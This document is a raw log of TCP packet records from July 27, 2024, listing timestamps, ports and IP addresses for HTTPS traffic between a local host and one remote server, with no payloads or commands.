Jul 27, 2024 11:39:00.887937069 CEST	443	49730	172.67.189.102	192.168.2.4
Jul 27, 2024 11:39:00.888510942 CEST	49730	443	192.168.2.4	172.67.189.102
Jul 27, 2024 11:39:00.889379978 CEST	443	49730	172.67.189.102	192.168.2.4
Jul 27, 2024 11:39:00.889424086 CEST	49730	443	192.168.2.4	172.67.189.102
Jul 27, 2024 11:39:00.889441013 CEST	443	49730	172.67.189.102	192.168.2.4
Jul 27, 2024 11:39:00.889482975 CEST	49730	443	192.168.2.4	172.67.189.102
Jul 27, 2024 11:39:00.890863895 CEST	443	49730	172.67.189.102	192.168.2.4
Jul 27, 2024 11:39:00.890928984 CEST	49730	443	192.168.2.4	172.67.189.102
Jul 27, 2024 11:39:00.890935898 CEST	443	49730	172.67.189.102	192.168.2.4
Jul 27, 2024 11:39:00.891887903 CEST	49730	443	192.168.2.4	172.67.189.102
Jul 27, 2024 11:39:00.892326117 CEST	443	49730	172.67.189.102	192.168.2.4
Jul 27, 2024 11:39:00.892381907 CEST	49730	443	192.168.2.4	172.67.189.102
Jul 27, 2024 11:39:00.892388105 CEST	443	49730	172.67.189.102	192.168.2.4
Jul 27, 2024 11:39:00.892430067 CEST	49730	443	192.168.2.4	172.67.189.102
Jul 27, 2024 11:39:00.893815994 CEST	443	49730	172.67.189.102	192.168.2.4
Jul 27, 2024 11:39:00.893973112 CEST	49730	443	192.168.2.4	172.67.189.102
Jul 27, 2024 11:39:00.893980980 CEST	443	49730	172.67.189.102	192.168.2.4
Jul 27, 2024 11:39:00.894022942 CEST	49730	443	192.168.2.4	172.67.189.102
Jul 27, 2024 11:39:00.895251989 CEST	443	49730	172.67.189.102	192.168.2.4
Jul 27, 2024 11:39:00.895287991 CEST	49730	443	192.168.2.4	172.67.189.102
Jul 27, 2024 11:39:00.895307064 CEST	443	49730	172.67.189.102	192.168.2.4
Jul 27, 2024 11:39:00.895363092 CEST	49730	443	192.168.2.4	172.67.189.102
Jul 27, 2024 11:39:00.896418095 CEST	443	49730	172.67.189.102	192.168.2.4
Jul 27, 2024 11:39:00.896506071 CEST	49730	443	192.168.2.4	172.67.189.102
Jul 27, 2024 11:39:00.896514893 CEST	443	49730	172.67.189.102	192.168.2.4
Jul 27, 2024 11:39:00.896761894 CEST	49730	443	192.168.2.4	172.67.189.102
Jul 27, 2024 11:39:00.897628069 CEST	443	49730	172.67.189.102	192.168.2.4
Jul 27, 2024 11:39:00.898776054 CEST	443	49730	172.67.189.102	192.168.2.4
Jul 27, 2024 11:39:00.898797989 CEST	49730	443	192.168.2.4	172.67.189.102
Jul 27, 2024 11:39:00.898803949 CEST	443	49730	172.67.189.102	192.168.2.4
Jul 27, 2024 11:39:00.898844004 CEST	49730	443	192.168.2.4	172.67.189.102
Jul 27, 2024 11:39:00.898844004 CEST	49730	443	192.168.2.4	172.67.189.102
Jul 27, 2024 11:39:00.898849964 CEST	443	49730	172.67.189.102	192.168.2.4
Jul 27, 2024 11:39:00.899343967 CEST	49730	443	192.168.2.4	172.67.189.102
Jul 27, 2024 11:39:00.900182009 CEST	443	49730	172.67.189.102	192.168.2.4
Jul 27, 2024 11:39:00.900247097 CEST	49730	443	192.168.2.4	172.67.189.102
Jul 27, 2024 11:39:00.900254011 CEST	443	49730	172.67.189.102	192.168.2.4
Jul 27, 2024 11:39:00.900407076 CEST	49730	443	192.168.2.4	172.67.189.102
Jul 27, 2024 11:39:00.960165024 CEST	443	49730	172.67.189.102	192.168.2.4
Jul 27, 2024 11:39:00.960510969 CEST	49730	443	192.168.2.4	172.67.189.102
Jul 27, 2024 11:39:00.979340076 CEST	443	49730	172.67.189.102	192.168.2.4
Jul 27, 2024 11:39:00.979393959 CEST	443	49730	172.67.189.102	192.168.2.4
Jul 27, 2024 11:39:00.979398966 CEST	49730	443	192.168.2.4	172.67.189.102
Jul 27, 2024 11:39:00.979407072 CEST	443	49730	172.67.189.102	192.168.2.4
Jul 27, 2024 11:39:00.979465008 CEST	443	49730	172.67.189.102	192.168.2.4
Jul 27, 2024 11:39:00.979480028 CEST	49730	443	192.168.2.4	172.67.189.102
Jul 27, 2024 11:39:00.979480028 CEST	49730	443	192.168.2.4	172.67.189.102
Jul 27, 2024 11:39:00.979559898 CEST	49730	443	192.168.2.4	172.67.189.102
Jul 27, 2024 11:39:00.982228994 CEST	49730	443	192.168.2.4	172.67.189.102
Jul 27, 2024 11:39:00.982249975 CEST	443	49730	172.67.189.102	192.168.2.4
Jul 27, 2024 11:39:01.216507912 CEST	49731	443	192.168.2.4	172.67.189.102
Jul 27, 2024 11:39:01.216552019 CEST	443	49731	172.67.189.102	192.168.2.4
Jul 27, 2024 11:39:01.216768026 CEST	49731	443	192.168.2.4	172.67.189.102
Jul 27, 2024 11:39:01.217010021 CEST	49731	443	192.168.2.4	172.67.189.102
Jul 27, 2024 11:39:01.217017889 CEST	443	49731	172.67.189.102	192.168.2.4
Jul 27, 2024 11:39:01.684470892 CEST	443	49731	172.67.189.102	192.168.2.4
Jul 27, 2024 11:39:01.684596062 CEST	49731	443	192.168.2.4	172.67.189.102
Jul 27, 2024 11:39:01.685237885 CEST	49731	443	192.168.2.4	172.67.189.102
Jul 27, 2024 11:39:01.685244083 CEST	443	49731	172.67.189.102	192.168.2.4
Jul 27, 2024 11:39:01.685369015 CEST	49731	443	192.168.2.4	172.67.189.102
Jul 27, 2024 11:39:01.685373068 CEST	443	49731	172.67.189.102	192.168.2.4
Jul 27, 2024 11:39:02.041716099 CEST	443	49731	172.67.189.102	192.168.2.4
Jul 27, 2024 11:39:02.041773081 CEST	443	49731	172.67.189.102	192.168.2.4
Jul 27, 2024 11:39:02.041817904 CEST	49731	443	192.168.2.4	172.67.189.102
Jul 27, 2024 11:39:02.041836023 CEST	443	49731	172.67.189.102	192.168.2.4
Jul 27, 2024 11:39:02.041855097 CEST	49731	443	192.168.2.4	172.67.189.102
Jul 27, 2024 11:39:02.041899920 CEST	49731	443	192.168.2.4	172.67.189.102
Jul 27, 2024 11:39:02.042839050 CEST	443	49731	172.67.189.102	192.168.2.4
Jul 27, 2024 11:39:02.042912960 CEST	49731	443	192.168.2.4	172.67.189.102
Jul 27, 2024 11:39:02.042918921 CEST	443	49731	172.67.189.102	192.168.2.4
Jul 27, 2024 11:39:02.042978048 CEST	49731	443	192.168.2.4	172.67.189.102
Jul 27, 2024 11:39:02.044164896 CEST	443	49731	172.67.189.102	192.168.2.4
Jul 27, 2024 11:39:02.044246912 CEST	49731	443	192.168.2.4	172.67.189.102
Jul 27, 2024 11:39:02.045507908 CEST	443	49731	172.67.189.102	192.168.2.4
Jul 27, 2024 11:39:02.045574903 CEST	49731	443	192.168.2.4	172.67.189.102
Jul 27, 2024 11:39:02.045579910 CEST	443	49731	172.67.189.102	192.168.2.4
Jul 27, 2024 11:39:02.045623064 CEST	49731	443	192.168.2.4	172.67.189.102
Jul 27, 2024 11:39:02.046905994 CEST	443	49731	172.67.189.102	192.168.2.4
Jul 27, 2024 11:39:02.046967030 CEST	49731	443	192.168.2.4	172.67.189.102
Jul 27, 2024 11:39:02.046972036 CEST	443	49731	172.67.189.102	192.168.2.4
Jul 27, 2024 11:39:02.047013044 CEST	49731	443	192.168.2.4	172.67.189.102
Jul 27, 2024 11:39:02.048342943 CEST	443	49731	172.67.189.102	192.168.2.4
Jul 27, 2024 11:39:02.048398972 CEST	49731	443	192.168.2.4	172.67.189.102
Jul 27, 2024 11:39:02.048403978 CEST	443	49731	172.67.189.102	192.168.2.4
Jul 27, 2024 11:39:02.048449993 CEST	49731	443	192.168.2.4	172.67.189.102
Jul 27, 2024 11:39:02.127455950 CEST	443	49731	172.67.189.102	192.168.2.4
Jul 27, 2024 11:39:02.127604961 CEST	49731	443	192.168.2.4	172.67.189.102
Jul 27, 2024 11:39:02.127618074 CEST	443	49731	172.67.189.102	192.168.2.4
Jul 27, 2024 11:39:02.127670050 CEST	49731	443	192.168.2.4	172.67.189.102
Jul 27, 2024 11:39:02.128551006 CEST	443	49731	172.67.189.102	192.168.2.4
Jul 27, 2024 11:39:02.128602028 CEST	443	49731	172.67.189.102	192.168.2.4
Jul 27, 2024 11:39:02.128612041 CEST	49731	443	192.168.2.4	172.67.189.102
Jul 27, 2024 11:39:02.128617048 CEST	443	49731	172.67.189.102	192.168.2.4
Jul 27, 2024 11:39:02.128648043 CEST	49731	443	192.168.2.4	172.67.189.102
Jul 27, 2024 11:39:02.128699064 CEST	49731	443	192.168.2.4	172.67.189.102
Jul 27, 2024 11:39:02.129750013 CEST	443	49731	172.67.189.102	192.168.2.4
Jul 27, 2024 11:39:02.129801035 CEST	49731	443	192.168.2.4	172.67.189.102
Jul 27, 2024 11:39:02.131087065 CEST	443	49731	172.67.189.102	192.168.2.4
Jul 27, 2024 11:39:02.131139994 CEST	49731	443	192.168.2.4	172.67.189.102
Jul 27, 2024 11:39:02.131145954 CEST	443	49731	172.67.189.102	192.168.2.4
Jul 27, 2024 11:39:02.131191969 CEST	49731	443	192.168.2.4	172.67.189.102
Jul 27, 2024 11:39:02.132390976 CEST	443	49731	172.67.189.102	192.168.2.4
Jul 27, 2024 11:39:02.132441044 CEST	443	49731	172.67.189.102	192.168.2.4
Jul 27, 2024 11:39:02.132446051 CEST	49731	443	192.168.2.4	172.67.189.102
Jul 27, 2024 11:39:02.132451057 CEST	443	49731	172.67.189.102	192.168.2.4
Jul 27, 2024 11:39:02.132498026 CEST	49731	443	192.168.2.4	172.67.189.102
Jul 27, 2024 11:39:02.133740902 CEST	443	49731	172.67.189.102	192.168.2.4
Jul 27, 2024 11:39:02.133800983 CEST	49731	443	192.168.2.4	172.67.189.102
Jul 27, 2024 11:39:02.135114908 CEST	443	49731	172.67.189.102	192.168.2.4
Jul 27, 2024 11:39:02.135178089 CEST	49731	443	192.168.2.4	172.67.189.102
Jul 27, 2024 11:39:02.135179043 CEST	443	49731	172.67.189.102	192.168.2.4
Jul 27, 2024 11:39:02.135190010 CEST	443	49731	172.67.189.102	192.168.2.4
Jul 27, 2024 11:39:02.135226965 CEST	49731	443	192.168.2.4	172.67.189.102
Jul 27, 2024 11:39:02.136151075 CEST	443	49731	172.67.189.102	192.168.2.4
Jul 27, 2024 11:39:02.136207104 CEST	49731	443	192.168.2.4	172.67.189.102
Jul 27, 2024 11:39:02.136212111 CEST	443	49731	172.67.189.102	192.168.2.4
Jul 27, 2024 11:39:02.136261940 CEST	49731	443	192.168.2.4	172.67.189.102
Jul 27, 2024 11:39:02.137214899 CEST	443	49731	172.67.189.102	192.168.2.4
Jul 27, 2024 11:39:02.137271881 CEST	49731	443	192.168.2.4	172.67.189.102
Jul 27, 2024 11:39:02.137278080 CEST	443	49731	172.67.189.102	192.168.2.4
Jul 27, 2024 11:39:02.137322903 CEST	49731	443	192.168.2.4	172.67.189.102
Jul 27, 2024 11:39:02.138329029 CEST	443	49731	172.67.189.102	192.168.2.4
Jul 27, 2024 11:39:02.138381958 CEST	49731	443	192.168.2.4	172.67.189.102
Jul 27, 2024 11:39:02.138387918 CEST	443	49731	172.67.189.102	192.168.2.4
Jul 27, 2024 11:39:02.138431072 CEST	49731	443	192.168.2.4	172.67.189.102
Jul 27, 2024 11:39:02.139395952 CEST	443	49731	172.67.189.102	192.168.2.4
Jul 27, 2024 11:39:02.139504910 CEST	49731	443	192.168.2.4	172.67.189.102
Jul 27, 2024 11:39:02.210251093 CEST	443	49731	172.67.189.102	192.168.2.4
Jul 27, 2024 11:39:02.210377932 CEST	49731	443	192.168.2.4	172.67.189.102
Jul 27, 2024 11:39:02.210386038 CEST	443	49731	172.67.189.102	192.168.2.4
Jul 27, 2024 11:39:02.210459948 CEST	49731	443	192.168.2.4	172.67.189.102
Jul 27, 2024 11:39:02.214131117 CEST	443	49731	172.67.189.102	192.168.2.4
Jul 27, 2024 11:39:02.214215994 CEST	49731	443	192.168.2.4	172.67.189.102
Jul 27, 2024 11:39:02.214477062 CEST	443	49731	172.67.189.102	192.168.2.4
Jul 27, 2024 11:39:02.214534044 CEST	49731	443	192.168.2.4	172.67.189.102
Jul 27, 2024 11:39:02.214539051 CEST	443	49731	172.67.189.102	192.168.2.4
Jul 27, 2024 11:39:02.214596987 CEST	49731	443	192.168.2.4	172.67.189.102
Jul 27, 2024 11:39:02.215620995 CEST	443	49731	172.67.189.102	192.168.2.4
Jul 27, 2024 11:39:02.215679884 CEST	49731	443	192.168.2.4	172.67.189.102
Jul 27, 2024 11:39:02.215687990 CEST	443	49731	172.67.189.102	192.168.2.4
Jul 27, 2024 11:39:02.215744972 CEST	49731	443	192.168.2.4	172.67.189.102
Jul 27, 2024 11:39:02.216664076 CEST	443	49731	172.67.189.102	192.168.2.4
Jul 27, 2024 11:39:02.216725111 CEST	49731	443	192.168.2.4	172.67.189.102
Jul 27, 2024 11:39:02.217885971 CEST	443	49731	172.67.189.102	192.168.2.4
Jul 27, 2024 11:39:02.217953920 CEST	49731	443	192.168.2.4	172.67.189.102
Jul 27, 2024 11:39:02.220093966 CEST	443	49731	172.67.189.102	192.168.2.4
Jul 27, 2024 11:39:02.220169067 CEST	49731	443	192.168.2.4	172.67.189.102
Jul 27, 2024 11:39:02.221045971 CEST	443	49731	172.67.189.102	192.168.2.4
Jul 27, 2024 11:39:02.221105099 CEST	49731	443	192.168.2.4	172.67.189.102
Jul 27, 2024 11:39:02.221996069 CEST	443	49731	172.67.189.102	192.168.2.4
Jul 27, 2024 11:39:02.222069025 CEST	49731	443	192.168.2.4	172.67.189.102
Jul 27, 2024 11:39:02.223084927 CEST	443	49731	172.67.189.102	192.168.2.4
Jul 27, 2024 11:39:02.223157883 CEST	49731	443	192.168.2.4	172.67.189.102
Jul 27, 2024 11:39:02.223990917 CEST	443	49731	172.67.189.102	192.168.2.4
Jul 27, 2024 11:39:02.224051952 CEST	49731	443	192.168.2.4	172.67.189.102
Jul 27, 2024 11:39:02.224941969 CEST	443	49731	172.67.189.102	192.168.2.4
Jul 27, 2024 11:39:02.224997044 CEST	49731	443	192.168.2.4	172.67.189.102
Jul 27, 2024 11:39:02.225963116 CEST	443	49731	172.67.189.102	192.168.2.4
Jul 27, 2024 11:39:02.226025105 CEST	49731	443	192.168.2.4	172.67.189.102
Jul 27, 2024 11:39:02.226881027 CEST	443	49731	172.67.189.102	192.168.2.4
Jul 27, 2024 11:39:02.226933956 CEST	49731	443	192.168.2.4	172.67.189.102
Jul 27, 2024 11:39:02.228678942 CEST	443	49731	172.67.189.102	192.168.2.4
Jul 27, 2024 11:39:02.228738070 CEST	49731	443	192.168.2.4	172.67.189.102
Jul 27, 2024 11:39:02.229466915 CEST	443	49731	172.67.189.102	192.168.2.4
Jul 27, 2024 11:39:02.229521036 CEST	49731	443	192.168.2.4	172.67.189.102
Jul 27, 2024 11:39:02.302767038 CEST	443	49731	172.67.189.102	192.168.2.4
Jul 27, 2024 11:39:02.302829981 CEST	49731	443	192.168.2.4	172.67.189.102
Jul 27, 2024 11:39:02.303683996 CEST	443	49731	172.67.189.102	192.168.2.4
Jul 27, 2024 11:39:02.303781986 CEST	49731	443	192.168.2.4	172.67.189.102
Jul 27, 2024 11:39:02.305509090 CEST	443	49731	172.67.189.102	192.168.2.4
Jul 27, 2024 11:39:02.305557013 CEST	49731	443	192.168.2.4	172.67.189.102
Jul 27, 2024 11:39:02.305565119 CEST	443	49731	172.67.189.102	192.168.2.4
Jul 27, 2024 11:39:02.305602074 CEST	49731	443	192.168.2.4	172.67.189.102
Jul 27, 2024 11:39:02.306443930 CEST	443	49731	172.67.189.102	192.168.2.4
Jul 27, 2024 11:39:02.306499958 CEST	49731	443	192.168.2.4	172.67.189.102
Jul 27, 2024 11:39:02.308245897 CEST	443	49731	172.67.189.102	192.168.2.4
Jul 27, 2024 11:39:02.308278084 CEST	443	49731	172.67.189.102	192.168.2.4
Jul 27, 2024 11:39:02.308312893 CEST	49731	443	192.168.2.4	172.67.189.102
Jul 27, 2024 11:39:02.308319092 CEST	443	49731	172.67.189.102	192.168.2.4
Jul 27, 2024 11:39:02.308327913 CEST	49731	443	192.168.2.4	172.67.189.102
Jul 27, 2024 11:39:02.308352947 CEST	49731	443	192.168.2.4	172.67.189.102
Jul 27, 2024 11:39:02.310062885 CEST	443	49731	172.67.189.102	192.168.2.4
Jul 27, 2024 11:39:02.310116053 CEST	49731	443	192.168.2.4	172.67.189.102
Jul 27, 2024 11:39:02.310791016 CEST	443	49731	172.67.189.102	192.168.2.4
Jul 27, 2024 11:39:02.310837030 CEST	49731	443	192.168.2.4	172.67.189.102
Jul 27, 2024 11:39:02.311517954 CEST	443	49731	172.67.189.102	192.168.2.4
Jul 27, 2024 11:39:02.311580896 CEST	49731	443	192.168.2.4	172.67.189.102
Jul 27, 2024 11:39:02.312987089 CEST	443	49731	172.67.189.102	192.168.2.4
Jul 27, 2024 11:39:02.313045025 CEST	49731	443	192.168.2.4	172.67.189.102
Jul 27, 2024 11:39:02.313050032 CEST	443	49731	172.67.189.102	192.168.2.4
Jul 27, 2024 11:39:02.313092947 CEST	49731	443	192.168.2.4	172.67.189.102
Jul 27, 2024 11:39:02.314398050 CEST	443	49731	172.67.189.102	192.168.2.4
Jul 27, 2024 11:39:02.314429045 CEST	443	49731	172.67.189.102	192.168.2.4
Jul 27, 2024 11:39:02.314450979 CEST	49731	443	192.168.2.4	172.67.189.102
Jul 27, 2024 11:39:02.314456940 CEST	443	49731	172.67.189.102	192.168.2.4
Jul 27, 2024 11:39:02.314481020 CEST	49731	443	192.168.2.4	172.67.189.102
Jul 27, 2024 11:39:02.314496994 CEST	49731	443	192.168.2.4	172.67.189.102
Jul 27, 2024 11:39:02.315969944 CEST	443	49731	172.67.189.102	192.168.2.4
Jul 27, 2024 11:39:02.315999985 CEST	443	49731	172.67.189.102	192.168.2.4
Jul 27, 2024 11:39:02.316036940 CEST	49731	443	192.168.2.4	172.67.189.102
Jul 27, 2024 11:39:02.316041946 CEST	443	49731	172.67.189.102	192.168.2.4
Jul 27, 2024 11:39:02.316087008 CEST	49731	443	192.168.2.4	172.67.189.102
Jul 27, 2024 11:39:02.316087008 CEST	49731	443	192.168.2.4	172.67.189.102
Jul 27, 2024 11:39:02.317661047 CEST	443	49731	172.67.189.102	192.168.2.4
Jul 27, 2024 11:39:02.317728043 CEST	49731	443	192.168.2.4	172.67.189.102
Jul 27, 2024 11:39:02.318049908 CEST	443	49731	172.67.189.102	192.168.2.4
Jul 27, 2024 11:39:02.318104029 CEST	49731	443	192.168.2.4	172.67.189.102
Jul 27, 2024 11:39:02.318743944 CEST	443	49731	172.67.189.102	192.168.2.4
Jul 27, 2024 11:39:02.318805933 CEST	49731	443	192.168.2.4	172.67.189.102
Jul 27, 2024 11:39:02.319662094 CEST	443	49731	172.67.189.102	192.168.2.4
Jul 27, 2024 11:39:02.319716930 CEST	49731	443	192.168.2.4	172.67.189.102
Jul 27, 2024 11:39:02.320585966 CEST	443	49731	172.67.189.102	192.168.2.4
Jul 27, 2024 11:39:02.320638895 CEST	49731	443	192.168.2.4	172.67.189.102
Jul 27, 2024 11:39:02.321511030 CEST	443	49731	172.67.189.102	192.168.2.4
Jul 27, 2024 11:39:02.321554899 CEST	443	49731	172.67.189.102	192.168.2.4
Jul 27, 2024 11:39:02.321579933 CEST	49731	443	192.168.2.4	172.67.189.102
Jul 27, 2024 11:39:02.321585894 CEST	443	49731	172.67.189.102	192.168.2.4
Jul 27, 2024 11:39:02.321597099 CEST	49731	443	192.168.2.4	172.67.189.102
Jul 27, 2024 11:39:02.321623087 CEST	49731	443	192.168.2.4	172.67.189.102
Jul 27, 2024 11:39:02.388941050 CEST	443	49731	172.67.189.102	192.168.2.4
Jul 27, 2024 11:39:02.388992071 CEST	443	49731	172.67.189.102	192.168.2.4
Jul 27, 2024 11:39:02.389058113 CEST	49731	443	192.168.2.4	172.67.189.102
Jul 27, 2024 11:39:02.389077902 CEST	443	49731	172.67.189.102	192.168.2.4
Jul 27, 2024 11:39:02.389117002 CEST	49731	443	192.168.2.4	172.67.189.102
Jul 27, 2024 11:39:02.389117002 CEST	49731	443	192.168.2.4	172.67.189.102
Jul 27, 2024 11:39:02.390332937 CEST	443	49731	172.67.189.102	192.168.2.4
Jul 27, 2024 11:39:02.390367031 CEST	443	49731	172.67.189.102	192.168.2.4
Jul 27, 2024 11:39:02.390398026 CEST	49731	443	192.168.2.4	172.67.189.102
Jul 27, 2024 11:39:02.390404940 CEST	443	49731	172.67.189.102	192.168.2.4
Jul 27, 2024 11:39:02.390428066 CEST	49731	443	192.168.2.4	172.67.189.102
Jul 27, 2024 11:39:02.390439987 CEST	49731	443	192.168.2.4	172.67.189.102
Jul 27, 2024 11:39:02.391047001 CEST	443	49731	172.67.189.102	192.168.2.4
Jul 27, 2024 11:39:02.391108990 CEST	49731	443	192.168.2.4	172.67.189.102
Jul 27, 2024 11:39:02.392451048 CEST	443	49731	172.67.189.102	192.168.2.4
Jul 27, 2024 11:39:02.392503977 CEST	49731	443	192.168.2.4	172.67.189.102
Jul 27, 2024 11:39:02.396092892 CEST	443	49731	172.67.189.102	192.168.2.4
Jul 27, 2024 11:39:02.396100044 CEST	443	49731	172.67.189.102	192.168.2.4
Jul 27, 2024 11:39:02.396157026 CEST	443	49731	172.67.189.102	192.168.2.4
Jul 27, 2024 11:39:02.396189928 CEST	49731	443	192.168.2.4	172.67.189.102
Jul 27, 2024 11:39:02.396219969 CEST	443	49731	172.67.189.102	192.168.2.4
Jul 27, 2024 11:39:02.396236897 CEST	49731	443	192.168.2.4	172.67.189.102
Jul 27, 2024 11:39:02.396281958 CEST	49731	443	192.168.2.4	172.67.189.102
Jul 27, 2024 11:39:02.396708012 CEST	443	49731	172.67.189.102	192.168.2.4
Jul 27, 2024 11:39:02.396765947 CEST	49731	443	192.168.2.4	172.67.189.102
Jul 27, 2024 11:39:02.400990009 CEST	443	49731	172.67.189.102	192.168.2.4
Jul 27, 2024 11:39:02.401007891 CEST	443	49731	172.67.189.102	192.168.2.4
Jul 27, 2024 11:39:02.401062012 CEST	49731	443	192.168.2.4	172.67.189.102
Jul 27, 2024 11:39:02.401070118 CEST	443	49731	172.67.189.102	192.168.2.4
Jul 27, 2024 11:39:02.401106119 CEST	49731	443	192.168.2.4	172.67.189.102
Jul 27, 2024 11:39:02.401679993 CEST	443	49731	172.67.189.102	192.168.2.4
Jul 27, 2024 11:39:02.401736975 CEST	49731	443	192.168.2.4	172.67.189.102
Jul 27, 2024 11:39:02.402383089 CEST	443	49731	172.67.189.102	192.168.2.4
Jul 27, 2024 11:39:02.402436018 CEST	49731	443	192.168.2.4	172.67.189.102
Jul 27, 2024 11:39:02.403078079 CEST	443	49731	172.67.189.102	192.168.2.4
Jul 27, 2024 11:39:02.403137922 CEST	49731	443	192.168.2.4	172.67.189.102
Jul 27, 2024 11:39:02.405543089 CEST	443	49731	172.67.189.102	192.168.2.4
Jul 27, 2024 11:39:02.405603886 CEST	49731	443	192.168.2.4	172.67.189.102
Jul 27, 2024 11:39:02.409444094 CEST	443	49731	172.67.189.102	192.168.2.4
Jul 27, 2024 11:39:02.409459114 CEST	443	49731	172.67.189.102	192.168.2.4
Jul 27, 2024 11:39:02.409519911 CEST	49731	443	192.168.2.4	172.67.189.102
Jul 27, 2024 11:39:02.409524918 CEST	443	49731	172.67.189.102	192.168.2.4
Jul 27, 2024 11:39:02.409568071 CEST	49731	443	192.168.2.4	172.67.189.102
Jul 27, 2024 11:39:02.411648035 CEST	443	49731	172.67.189.102	192.168.2.4
Jul 27, 2024 11:39:02.411712885 CEST	49731	443	192.168.2.4	172.67.189.102
Jul 27, 2024 11:39:02.413002014 CEST	443	49731	172.67.189.102	192.168.2.4
Jul 27, 2024 11:39:02.413069963 CEST	49731	443	192.168.2.4	172.67.189.102
Jul 27, 2024 11:39:02.413691998 CEST	443	49731	172.67.189.102	192.168.2.4
Jul 27, 2024 11:39:02.413749933 CEST	49731	443	192.168.2.4	172.67.189.102
Jul 27, 2024 11:39:02.414403915 CEST	443	49731	172.67.189.102	192.168.2.4
Jul 27, 2024 11:39:02.414465904 CEST	49731	443	192.168.2.4	172.67.189.102
Jul 27, 2024 11:39:02.416568995 CEST	443	49731	172.67.189.102	192.168.2.4
Jul 27, 2024 11:39:02.416635036 CEST	443	49731	172.67.189.102	192.168.2.4
Jul 27, 2024 11:39:02.416635036 CEST	49731	443	192.168.2.4	172.67.189.102
Jul 27, 2024 11:39:02.416647911 CEST	443	49731	172.67.189.102	192.168.2.4
Jul 27, 2024 11:39:02.416686058 CEST	49731	443	192.168.2.4	172.67.189.102
Jul 27, 2024 11:39:02.419104099 CEST	443	49731	172.67.189.102	192.168.2.4
Jul 27, 2024 11:39:02.419143915 CEST	443	49731	172.67.189.102	192.168.2.4
Jul 27, 2024 11:39:02.419176102 CEST	49731	443	192.168.2.4	172.67.189.102
Jul 27, 2024 11:39:02.419182062 CEST	443	49731	172.67.189.102	192.168.2.4
Jul 27, 2024 11:39:02.419239998 CEST	49731	443	192.168.2.4	172.67.189.102
Jul 27, 2024 11:39:02.419374943 CEST	49731	443	192.168.2.4	172.67.189.102
Jul 27, 2024 11:39:02.430713892 CEST	443	49731	172.67.189.102	192.168.2.4
Jul 27, 2024 11:39:02.430818081 CEST	49731	443	192.168.2.4	172.67.189.102
Jul 27, 2024 11:39:02.431545973 CEST	443	49731	172.67.189.102	192.168.2.4
Jul 27, 2024 11:39:02.431709051 CEST	49731	443	192.168.2.4	172.67.189.102
Jul 27, 2024 11:39:02.497613907 CEST	443	49731	172.67.189.102	192.168.2.4
Jul 27, 2024 11:39:02.497803926 CEST	49731	443	192.168.2.4	172.67.189.102
Jul 27, 2024 11:39:02.500530005 CEST	443	49731	172.67.189.102	192.168.2.4
Jul 27, 2024 11:39:02.500551939 CEST	443	49731	172.67.189.102	192.168.2.4
Jul 27, 2024 11:39:02.500583887 CEST	443	49731	172.67.189.102	192.168.2.4
Jul 27, 2024 11:39:02.500614882 CEST	49731	443	192.168.2.4	172.67.189.102
Jul 27, 2024 11:39:02.500632048 CEST	443	49731	172.67.189.102	192.168.2.4
Jul 27, 2024 11:39:02.500648022 CEST	49731	443	192.168.2.4	172.67.189.102
Jul 27, 2024 11:39:02.500674963 CEST	49731	443	192.168.2.4	172.67.189.102
Jul 27, 2024 11:39:02.503375053 CEST	443	49731	172.67.189.102	192.168.2.4
Jul 27, 2024 11:39:02.503415108 CEST	443	49731	172.67.189.102	192.168.2.4
Jul 27, 2024 11:39:02.503458977 CEST	49731	443	192.168.2.4	172.67.189.102
Jul 27, 2024 11:39:02.503467083 CEST	443	49731	172.67.189.102	192.168.2.4
Jul 27, 2024 11:39:02.503484964 CEST	49731	443	192.168.2.4	172.67.189.102
Jul 27, 2024 11:39:02.503562927 CEST	49731	443	192.168.2.4	172.67.189.102
Jul 27, 2024 11:39:02.506608009 CEST	443	49731	172.67.189.102	192.168.2.4
Jul 27, 2024 11:39:02.506645918 CEST	443	49731	172.67.189.102	192.168.2.4
Jul 27, 2024 11:39:02.506678104 CEST	49731	443	192.168.2.4	172.67.189.102
Jul 27, 2024 11:39:02.506690025 CEST	443	49731	172.67.189.102	192.168.2.4
Jul 27, 2024 11:39:02.506705999 CEST	49731	443	192.168.2.4	172.67.189.102
Jul 27, 2024 11:39:02.506724119 CEST	49731	443	192.168.2.4	172.67.189.102
Jul 27, 2024 11:39:02.507468939 CEST	443	49731	172.67.189.102	192.168.2.4
Jul 27, 2024 11:39:02.507536888 CEST	49731	443	192.168.2.4	172.67.189.102
Jul 27, 2024 11:39:02.507543087 CEST	443	49731	172.67.189.102	192.168.2.4
Jul 27, 2024 11:39:02.507580042 CEST	49731	443	192.168.2.4	172.67.189.102
Jul 27, 2024 11:39:02.513910055 CEST	443	49731	172.67.189.102	192.168.2.4
Jul 27, 2024 11:39:02.513977051 CEST	49731	443	192.168.2.4	172.67.189.102
Jul 27, 2024 11:39:02.515307903 CEST	443	49731	172.67.189.102	192.168.2.4
Jul 27, 2024 11:39:02.515367985 CEST	443	49731	172.67.189.102	192.168.2.4
Jul 27, 2024 11:39:02.515405893 CEST	49731	443	192.168.2.4	172.67.189.102
Jul 27, 2024 11:39:02.515414953 CEST	443	49731	172.67.189.102	192.168.2.4
Jul 27, 2024 11:39:02.515433073 CEST	49731	443	192.168.2.4	172.67.189.102
Jul 27, 2024 11:39:02.515455008 CEST	49731	443	192.168.2.4	172.67.189.102
Jul 27, 2024 11:39:02.518129110 CEST	443	49731	172.67.189.102	192.168.2.4
Jul 27, 2024 11:39:02.518161058 CEST	443	49731	172.67.189.102	192.168.2.4
Jul 27, 2024 11:39:02.518193960 CEST	49731	443	192.168.2.4	172.67.189.102
Jul 27, 2024 11:39:02.518203020 CEST	443	49731	172.67.189.102	192.168.2.4
Jul 27, 2024 11:39:02.518218994 CEST	49731	443	192.168.2.4	172.67.189.102
Jul 27, 2024 11:39:02.518237114 CEST	49731	443	192.168.2.4	172.67.189.102
Jul 27, 2024 11:39:02.520021915 CEST	443	49731	172.67.189.102	192.168.2.4
Jul 27, 2024 11:39:02.520054102 CEST	443	49731	172.67.189.102	192.168.2.4
Jul 27, 2024 11:39:02.520087957 CEST	49731	443	192.168.2.4	172.67.189.102
Jul 27, 2024 11:39:02.520093918 CEST	443	49731	172.67.189.102	192.168.2.4
Jul 27, 2024 11:39:02.520118952 CEST	49731	443	192.168.2.4	172.67.189.102
Jul 27, 2024 11:39:02.520133018 CEST	49731	443	192.168.2.4	172.67.189.102
Jul 27, 2024 11:39:02.520925045 CEST	443	49731	172.67.189.102	192.168.2.4
Jul 27, 2024 11:39:02.520989895 CEST	49731	443	192.168.2.4	172.67.189.102
Jul 27, 2024 11:39:02.520996094 CEST	443	49731	172.67.189.102	192.168.2.4
